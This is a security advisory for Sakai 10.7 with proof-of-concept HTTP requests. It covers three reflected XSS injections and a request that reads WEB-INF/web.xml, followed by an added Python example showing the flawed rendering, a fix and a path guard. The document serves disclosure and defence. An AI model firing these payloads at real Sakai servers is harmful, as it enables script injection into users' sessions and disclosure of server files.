Sakai 10.7 Cross Site Scripting / Local File Inclusion
Posted on 22 August 2016
Sakai 10.7 Multiple Vulnerabilities

Vendor: Apereo Foundation
Product web page: https://www.sakaiproject.org
Affected version: 10.7 (Kernel 10.7)

Summary: Sakai is a free, community source, educational software platform designed to support teaching, research and collaboration. Systems of this type are also known as Course Management Systems (CMS), Learning Management Systems (LMS), or Virtual Learning Environments (VLE).

Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities: input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. There is also a file disclosure vulnerability when calling a custom tool script: the requested path is not properly verified before being used to read files, which can be exploited to disclose the contents of files from local resources.

Tested on: Apache-Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2016-5358
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php
Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)
        https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)
        https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)
        https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)

29.06.2016

--

XSS when using file upload (filename parameter):
------------------------------------------------

POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

------WebKitFormBoundaryViazQNB5ok9E64l2
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"
Content-Type: application/octet-stream

testingus
------WebKitFormBoundaryViazQNB5ok9E64l2--

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=EmulateIE11
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 383
Date: Wed, 29 Jun 2016 11:45:49 GMT
Connection: close

<script type="text/javascript">
(function(){ var d = document.domain ; while ( true ) { try { var test = parent.document.domain ; break ; } catch( e ) {} d = d.replace( /.*?(?:.|$)/, '' ) ; if ( d.length == 0 ) break ; try { document.domain = d ; } catch (e) { break ; }}})() ;
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');
</script>

XSS when creating a job (After creating a job, click on "Triggers" link):
-------------------------------------------------------------------------

GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1
Host: localhost:8080

XSS in URI:
-----------

GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1
Host: localhost:8080

LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics. Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting: /portal/tool/[TOOL_ID]/WEB-INF/web.xml):
----------------------------------------

GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
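The two root causes above, the upload filename being concatenated into a JavaScript string literal and the tool resource path being used without normalisation, are illustrated below in an added Python example. It is not Sakai's code and not part of the advisory: `render_callback_unsafe` reproduces the vulnerable rendering pattern visible in the advisory's response, `render_callback_safe` is a hardened form that emits the filename as a JSON string literal, `callback_args_are_literals` is a small check a reviewer or test suite can run over the rendered output, and `is_allowed_tool_resource` is a hypothetical guard that rejects tool resource paths resolving into WEB-INF or META-INF. The sample filename and request paths are taken from the advisory; the function names are assumptions.

```python
import json
import posixpath
import re
from urllib.parse import unquote

# Sample values taken from the advisory's requests (used here as test input).
SAMPLE_FILENAME = "test.jsp'-alert(1)-'foo"
SAMPLE_LFI_PATH = ("/portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/"
                   "CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml")


def render_callback_unsafe(filename):
    """Vulnerable pattern as seen in the advisory's response: the uploaded
    filename is pasted into a single-quoted JS string without encoding, so a
    quote in the filename terminates the literal (hypothetical reconstruction)."""
    return "window.parent.OnUploadCompleted(201,'',%s,'');" % ("'" + filename + "'")


def render_callback_safe(filename):
    """Hardened form (added here): encode the value as a JSON string literal,
    which escapes quotes and backslashes, and additionally break up '</' so
    the value cannot close the surrounding <script> element."""
    encoded = json.dumps(filename).replace("</", "<\\/")
    return "window.parent.OnUploadCompleted(201,'',%s,'');" % encoded


def split_call_args(call):
    """Split the argument list of one JS call on commas that sit outside
    string literals (handles ' and " quotes and backslash escapes)."""
    start = call.index("(") + 1
    end = call.rindex(")")
    args, cur, quote, i = [], "", None, start
    while i < end:
        ch = call[i]
        if quote:
            cur += ch
            if ch == "\\":          # escaped char: copy it verbatim
                cur += call[i + 1]
                i += 1
            elif ch == quote:       # closing quote of the current literal
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            cur += ch
        elif ch == ",":
            args.append(cur)
            cur = ""
        else:
            cur += ch
        i += 1
    args.append(cur)
    return args


# A well-formed argument is a bare number or exactly one complete string literal.
_LITERAL = re.compile(r"""^(?:\d+|'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")$""")


def callback_args_are_literals(call):
    """True when every argument of the rendered call is a single literal, i.e.
    no attacker-controlled text ended up outside a string literal."""
    return all(_LITERAL.match(a) for a in split_call_args(call))


_TOOL_PATH = re.compile(r"^/portal/tool/([^/]+)/(.*)$")
_PROTECTED = {"WEB-INF", "META-INF"}


def is_allowed_tool_resource(request_path):
    """Hypothetical guard for the tool resource path: percent-decode, collapse
    '.' and '..' segments against an absolute root, then refuse any path whose
    segments include WEB-INF or META-INF (case-insensitive)."""
    m = _TOOL_PATH.match(unquote(request_path))
    if not m:
        return False
    resource = posixpath.normpath("/" + m.group(2))   # '..' cannot climb above '/'
    segments = [s.upper() for s in resource.split("/") if s]
    return not any(s in _PROTECTED for s in segments)


if __name__ == "__main__":
    print(render_callback_unsafe(SAMPLE_FILENAME),
          callback_args_are_literals(render_callback_unsafe(SAMPLE_FILENAME)))
    print(render_callback_safe(SAMPLE_FILENAME),
          callback_args_are_literals(render_callback_safe(SAMPLE_FILENAME)))
    print(SAMPLE_LFI_PATH, is_allowed_tool_resource(SAMPLE_LFI_PATH))
```

The JSON encoding is the same approach most server-side templating libraries use for values embedded in script blocks; the `</` replacement matters because the HTML parser ends a `<script>` element before the JavaScript parser ever sees the string. The path guard normalises before checking, which is why it also rejects the plain `/portal/tool/[TOOL_ID]/WEB-INF/web.xml` form the advisory notes and a percent-encoded `..%2F` variant.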